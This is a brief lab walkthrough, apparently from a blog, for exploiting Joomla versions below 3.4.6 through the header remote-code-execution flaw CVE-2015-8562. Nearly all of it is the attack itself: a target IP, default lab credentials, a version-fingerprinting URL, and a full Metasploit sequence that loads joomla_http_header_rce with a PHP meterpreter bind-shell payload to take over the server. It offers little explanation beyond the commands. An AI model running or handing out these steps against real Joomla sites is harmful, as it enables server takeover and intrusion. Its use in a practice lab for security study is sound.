Hack Joomla

Hack Joomla

Hack Joomla

Victim Server IP: 124.124.124.178

Exploit Joomla Shell Upload RCE-CVE-2015-8562

All versions of the Joomla! below 3.4.6 are known to be vulnerable.

But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.

######################################################################

##  VM Joomla Lab  For Testing, Download from: 

## https://www.dropbox.com/s/otcizorzqilvjll/Joomla_VM.rar?dl=0

######################################################################

Login account (If you need)

User: joomla

Pass: joomla

Switch to user "root"

sudo su

(Enter user joomla's password)

# Information Gathering:

http://124.124.124.178/joomla/administrator

admin/admin (if you want test login)

# Finding out the Joomla version:

http://124.124.124.178/joomla/language/en-GB/en-GB.xml

#Metasploit has got a scanner to find this. We can use that as well.

#Start Metasploit,

msfconsole

use exploit/multi/http/joomla_http_header_rce

set PAYLOAD php/meterpreter/bind_tcp

set RHOST 124.124.124.178

set TARGETURI /joomla/

exploit

#Vannakk #Joomla